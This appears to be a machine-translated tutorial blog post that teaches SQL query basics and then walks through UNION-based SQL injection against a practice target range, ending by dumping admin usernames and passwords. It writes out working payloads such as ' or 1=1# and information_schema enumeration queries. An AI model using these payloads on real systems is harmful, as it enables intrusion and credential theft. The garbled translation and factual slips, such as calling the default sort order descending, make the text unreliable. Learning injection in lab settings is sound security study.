SQL query statement & injection actual combat (hand note)

table of Contents

Preface

To tell a joke, the whole world can be injected, but it cannot be injected into your heart.

Insert picture description here


(Subtext, you do not belong to the collection of the whole world, suppose you belong to the collection of humans, humans belong to the collection of worlds, you do not belong to the collection of worlds, so you do not belong to the collection of humans, so it is concluded that you are not a human!!!)

Condition query

Let's take a look at the table in the environment first.

Insert picture description here


What kind of conditional query method is actually adding a where statement.
Here is an example.

Insert picture description here


Suppose Xiao Ming is extracted now

select * from hello where id=1;
或者
select * from hello where name="小明";
或者
select * from hello where name="小明" or id = 1;
或者
select * from hello where id=1 and age=15;
Insert picture description here

Query order

The
default order by in sql is descending desc, sorting from small to large in descending order.
The default order.

select * from hello;
#select * from hello order by desc;

But the point is not this.
it is this

select * from hello order by 1;
select * from hello order by 3;

Look carefully at the following two results,

Insert picture description here


you will find this and

select * from hello order by id;
select * from hello order by age;

Are equivalent.
So what's the specific use of this? Of course, it's not just for sorting. In fact, it's still a few fields when injecting.
for example

Insert picture description here

Limit result

Insert picture description here


limit x,y
x refers to where to start (counting from 0) y refers to how many to take from x.
For example, limit 0, 2
takes the
first one, and the second one
and so on.
For example, limit 1, 2
takes the
second and third one.

Joint query

Let me give you an example to
extract the name and age, and use a joint query.

select name from hello union select age from hello;
Insert picture description here


This is to combine two different results together.
Pay attention to two points below: the
first joint part of the query can be two different tables.
The second is that the two results of the joint query must be the same.
for example:

Insert picture description here


Pay attention to one more result below

Insert picture description here

Display dislocation

This, first of all, we have to know the number of fields returned in the first half of the query. What's the use? Look at the post-related example below.
How to play, just look at the result example.

Insert picture description here

SQL built-in functions

View database name

select database();
Insert picture description here


View users

Insert picture description here


View version

Insert picture description here


Back to the previous summary

Insert picture description here

Built-in database and tables

This is built-in, mainly for storing some tables, databases, and user information. This is very important. Basically, it is the entry point that is engaged in penetration injection, which is to obtain the user and password of the database.

Insert picture description here


For example, the correlation of this table.

Insert picture description here


Here is an example:

Insert picture description here

mycli auxiliary commands

This is a good thing, written in python, the function is to have a command prompt, making your operation more convenient.

Insert picture description here


Insert picture description here


Insert picture description here

Sql injection type

This is divided into two types, one is plastic injection and the other is character injection.
What is the difference between these two things, or why they are divided into these two, is actually due to the query statement.
In a url URL, a very typical one is "?id=content" and the following id=1 is combined with the back-end data interaction to generate a query statement, for example:

https://hello.com?id=5假设这个是页面切换的网址
那么对应的sql查询语句可能就是
select html_view from html_views where id = 5 这个就是整形
或者
select html_view from html_views where id = '5'这个就是字符
Insert picture description here


Now let's try
1+1.

Insert picture description here


Obviously, this thing treats that as a character. According to reason, if it is plastic, then 1+1 is 2. Then it will return to this page

Insert picture description here


. Try it now, get all the data, and inject it. This is low-level, so there is no filtering, and it is injected directly.

Insert picture description here


This is equivalent to forming such a sentence

select * from table where id='' or 1=1#';

That is just equivalent. In addition, this is not a blind shot, it has obvious hints, it is a relatively basic shooting range. Just look at the music. This example mainly introduces the injection type.

Combat shooting range

If it wasn't for me, if it wasn't for what it was, then whoever went to the shooting range would be close.
This is a classic example.
We got his administrator password

Insert picture description here

Determine whether there is an injection point for the type, the type

In fact, it is directly the id injection point, but it depends on what type it is.
If you want to inject characters, you have to add a # sign, right?

Insert picture description here


Insert picture description here

See how many fields he has

This is to guess by luck
3 no way,

Insert picture description here


guess two

Insert picture description here

Database query

How to play? Look at this.

Insert picture description here


So, get it, go to the database

Insert picture description here

Get the table name

This is actually just a look, let me make it clearer here.
Do you remember the previous instruction?

union select table_name from information_schema.tables where table_schema='huterox';

Change it.
First introduce a group_concat() function.
This is actually to check what values ​​are under the current field.

Insert picture description here


Insert picture description here
union select table_name from information_schema.tables where table_schema='maoshe';

We query the current table, that is, the field name of the table that stores maoshe, and we also need to get the value inside, so that we know which tables are in this.
So add a job

union select group_concat(table_name) from information_schema.tables where table_schema='maoshe'
Insert picture description here

Burst field name

A wave of blind guesses is the admin, and there is what I want in it.
Let's take a look at what's in the admin user.

union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
Insert picture description here

Get the password, view the value of the password field

union select 1,group_concat(username,":",password) from maoshe.admin
Insert picture description here

to sum up

1. Guess
how many fields there are . 2. After knowing a few fields, use the joint query to do things
. 3. Know some of the built-in databases of SQL, such as where the tables are placed.
4. Good luck, got a vulnerable website, except for the shooting range.
The key point is to
know what the database is.
Guess which user table is.
Guess what fields are in the user table.
Extract field values